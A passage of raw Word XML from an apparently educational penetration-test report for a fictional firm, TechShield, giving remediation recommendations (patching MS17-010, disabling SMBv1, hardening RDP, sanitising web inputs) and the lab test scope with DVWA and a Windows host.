    <w:p w14:paraId="2E86BAEE" w14:textId="77777777" w:rsidR="00C309CB" w:rsidRPr="00C309CB" w:rsidRDefault="00C309CB" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C309CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Web Application Testing Platform</w:t>
      </w:r>
      <w:r w:rsidRPr="00C309CB">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>: DVWA was configured with adjustable security levels, allowing controlled demonstration of vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BE0A8A" w14:textId="77777777" w:rsidR="00C309CB" w:rsidRPr="00C309CB" w:rsidRDefault="00C309CB" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C309CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Forensic Chain of Custody</w:t>
      </w:r>
      <w:r w:rsidRPr="00C309CB">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>: MD5 hashes were verified in Kali and Autopsy, ensuring forensic integrity of the evidence image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C38642" w14:textId="7B73FC86" w:rsidR="009D0A37" w:rsidRPr="00C309CB" w:rsidRDefault="00C309CB" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C309CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Logging of Exploitation Steps</w:t>
      </w:r>
      <w:r w:rsidRPr="00C309CB">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>: Screenshots and commands were captured systematically, supporting reproducibility and transparency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678B0C15" w14:textId="77777777" w:rsidR="009D0A37" w:rsidRDefault="009D0A37" w:rsidP="009D0A37">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_b042z9cl6opw" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="6" w:name="_Toc401142734"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:t>Areas for Improvement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="5C5B765E" w14:textId="4FE05C8E" w:rsidR="009D0A37" w:rsidRDefault="00F54BF4" w:rsidP="003D641E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="009A5766">
        <w:t>recommend</w:t>
      </w:r>
      <w:r w:rsidR="009D0A37">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C309CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>TechShield</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D0A37">
        <w:t xml:space="preserve"> takes the following actions to improve the security of the network. Implementing these recommendations will reduce the likelihood that an attacker will be able to successfully attack </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00734BBF" w:rsidRPr="00C309CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>TechShield</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D0A37">
        <w:t xml:space="preserve"> information systems and/or reduce the impact of a successful attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD8CDD7" w14:textId="77777777" w:rsidR="009D0A37" w:rsidRPr="006D54ED" w:rsidRDefault="009D0A37" w:rsidP="009D0A37">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc1310842615"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Short Term Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075D74D8" w14:textId="79AD0D8A" w:rsidR="009D0A37" w:rsidRDefault="00FA2B5B" w:rsidP="003D641E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA2B5B">
        <w:t xml:space="preserve">I recommend </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA2B5B">
        <w:t>TechShield</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA2B5B">
        <w:t xml:space="preserve"> take the following actions as soon as possible to minimize business risk:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547BA2E7" w14:textId="08E78901" w:rsidR="00C76893" w:rsidRPr="00C76893" w:rsidRDefault="00C76893" w:rsidP="003D641E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76893">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Patch Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD58F74" w14:textId="77777777" w:rsidR="002D5A5D" w:rsidRDefault="00C76893" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_dor40lylbmp2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidRPr="00C76893">
        <w:t>Apply missing patches, including MS17-010 on Windows systems.</w:t>
      </w:r>
      <w:r w:rsidR="002D5A5D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F454922" w14:textId="6CA05479" w:rsidR="009D0A37" w:rsidRDefault="002D5A5D" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5A5D">
        <w:t>Update outdated Apache, PHP, and OpenSSL components on servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610A0B0F" w14:textId="77777777" w:rsidR="00C76893" w:rsidRDefault="00C76893" w:rsidP="00C76893">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A9F3299" w14:textId="06339135" w:rsidR="00C76893" w:rsidRPr="00C76893" w:rsidRDefault="00897639" w:rsidP="00C76893">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00897639">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Access Control &amp; Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1E144D" w14:textId="77777777" w:rsidR="00897639" w:rsidRDefault="00897639" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00897639">
        <w:t>Disable SMBv1 and enforce SMB signing.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1380FF7D" w14:textId="76FA4460" w:rsidR="00877177" w:rsidRDefault="00897639" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00897639">
        <w:lastRenderedPageBreak/>
        <w:t>Require strong, complex passwords and enforce account lockouts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A42E171" w14:textId="36C411FC" w:rsidR="00897639" w:rsidRDefault="00897639" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00897639">
        <w:t>Disable default/guest accounts where possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A719E4" w14:textId="08A9E711" w:rsidR="00C76893" w:rsidRPr="00C76893" w:rsidRDefault="002A373A" w:rsidP="00C76893">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A373A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Remote Access Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD104BA" w14:textId="77777777" w:rsidR="009E5172" w:rsidRDefault="00DC6FDF" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC6FDF">
        <w:t>Enforce Network Level Authentication (NLA) and TLS on RDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D75C56" w14:textId="6F6A5879" w:rsidR="00877177" w:rsidRDefault="009E5172" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009E5172">
        <w:t>Restrict RDP and SMB access to trusted administrative subnets only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF8E3E2" w14:textId="1ECBBF17" w:rsidR="00C76893" w:rsidRPr="00C76893" w:rsidRDefault="00303A32" w:rsidP="00C76893">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00303A32">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Web Application Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DBE9F1" w14:textId="5FB9D532" w:rsidR="00877177" w:rsidRDefault="00303A32" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00303A32">
        <w:t>Sanitize user inputs to prevent SQLi and XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A81EE7E" w14:textId="003F291E" w:rsidR="009D0A37" w:rsidRDefault="00303A32" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00303A32">
        <w:t>Restrict file uploads and disable execution in upload directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A71583" w14:textId="77777777" w:rsidR="009D0A37" w:rsidRPr="006D54ED" w:rsidRDefault="009D0A37" w:rsidP="003D641E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc1737353370"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Long Term Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250A001B" w14:textId="11530AF5" w:rsidR="009D0A37" w:rsidRDefault="00E26E66" w:rsidP="00A733A5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E26E66">
        <w:t xml:space="preserve">I recommend the following actions be taken over the next 6–12 months to address harder-to-remediate issues that do not pose an urgent risk but still weaken </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E26E66">
        <w:t>TechShield’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E26E66">
        <w:t xml:space="preserve"> defenses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34611980" w14:textId="46F11533" w:rsidR="00D712CF" w:rsidRPr="00C76893" w:rsidRDefault="00D712CF" w:rsidP="00D712CF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D712CF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>System Lifecycle Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1C0E6F" w14:textId="676B70A2" w:rsidR="00D712CF" w:rsidRDefault="00D16C06" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D16C06">
        <w:t>Migrate unsupported operating systems to currently supported versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B625E04" w14:textId="1AFAAFF2" w:rsidR="00D712CF" w:rsidRDefault="00D16C06" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D16C06">
        <w:t>Regularly review asset inventory to decommission legacy services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BD80F0" w14:textId="4D1890EA" w:rsidR="00D712CF" w:rsidRPr="00C76893" w:rsidRDefault="00851C72" w:rsidP="00D712CF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00851C72">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Security Program Enhancements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C086DF3" w14:textId="50C0ACF2" w:rsidR="00D712CF" w:rsidRDefault="007612B6" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007612B6">
        <w:t>Implement centralized logging and SIEM monitoring for brute-force attempts and exploitation activities.</w:t>
      </w:r>
      <w:r w:rsidR="00F07ECA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411C4C94" w14:textId="1281758D" w:rsidR="00F07ECA" w:rsidRDefault="00F07ECA" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07ECA">
        <w:t>Introduce regular red-team/blue-team exercises to test detection and response capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6ED95F" w14:textId="29D22A44" w:rsidR="00D712CF" w:rsidRDefault="00F07ECA" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07ECA">
        <w:t>Develop and enforce a patch management policy with defined SLAs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7995E009" w14:textId="6D465242" w:rsidR="00D712CF" w:rsidRPr="00C76893" w:rsidRDefault="003866CB" w:rsidP="00D712CF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003866CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Forensic Readiness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ACAF37" w14:textId="77777777" w:rsidR="006C2AA9" w:rsidRDefault="003866CB" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003866CB">
        <w:t>Standardize forensic investigation procedures, including evidence collection and reporting templates.</w:t>
      </w:r>
      <w:r w:rsidR="006C2AA9" w:rsidRPr="006C2AA9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C0A0E6" w14:textId="142F3FBB" w:rsidR="00D712CF" w:rsidRDefault="006C2AA9" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006C2AA9">
        <w:t>Train staff on Autopsy and other forensic tools to ensure repeatability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC29582" w14:textId="77777777" w:rsidR="003B22BD" w:rsidRDefault="003B22BD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc604734905"/>
    </w:p>
    <w:p w14:paraId="15FA3AF7" w14:textId="22BD9324" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SCOPE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="775B21DD" w14:textId="13D83041" w:rsidR="005B7152" w:rsidRDefault="005B7152" w:rsidP="005B7152">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc363979068"/>
      <w:r>
        <w:t>Project Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="3BB4D319" w14:textId="58090D6B" w:rsidR="00475B86" w:rsidRDefault="002260A1" w:rsidP="003D641E">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002260A1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>All testing was based on the scope as defined in the Request for Proposal (RFP) and official written communications. The items in scope are listed below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7329828E" w14:textId="025AA9F4" w:rsidR="00D66C07" w:rsidRDefault="009A210C" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>Web Server</w:t>
      </w:r>
      <w:r w:rsidR="004B1DD4">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B1760" w:rsidRPr="000B1760">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>– DVWA (Damn Vulnerable Web Application) hosted on the Application Server (192.168.57.30).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AB757D" w14:textId="340C9DA5" w:rsidR="00D66C07" w:rsidRDefault="009A210C" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>Database Server</w:t>
      </w:r>
      <w:r w:rsidR="000B1760">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B1760" w:rsidRPr="000B1760">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>– MySQL backend supporting DVWA, tested during SQL Injection enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E7FE28" w14:textId="3587514B" w:rsidR="009A210C" w:rsidRDefault="009A210C" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>Centralized Directory</w:t>
      </w:r>
      <w:r w:rsidR="00756DC5" w:rsidRPr="00756DC5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00756DC5" w:rsidRPr="00756DC5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>– Windows Victim-Laptop (192.168.57.20) representing a domain-connected host with SMB, RPC, and RDP services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4478A017" w14:textId="2F009080" w:rsidR="009A210C" w:rsidRPr="00D66C07" w:rsidRDefault="00756DC5" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>Corporate</w:t>
      </w:r>
      <w:r w:rsidR="009A210C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Network (LAN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00756DC5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00756DC5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">– Simulated lab environment (192.168.57.0/24) representing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00756DC5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>TechShield’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00756DC5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> internal corporate network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231336DB" w14:textId="46D021C2" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_ivezkd6kiocx"/>
      <w:bookmarkStart w:id="13" w:name="_Toc1320701725"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:t>Network</w:t>
      </w:r>
      <w:r w:rsidR="005B7152">
        <w:t xml:space="preserve"> Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>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gridCol w:w="5100"/>
      </w:tblGrid>
      <w:tr w:rsidR="00475B86" w14:paraId="3FEFF2AD" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="039BE5"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="332C420E"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Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="039BE5"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="43EEEC67"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Note</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86" w14:paraId="557133AD" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4260" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="733DA6B8" w14:textId="5B006995" w:rsidR="00475B86" w:rsidRDefault="00A252DE">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
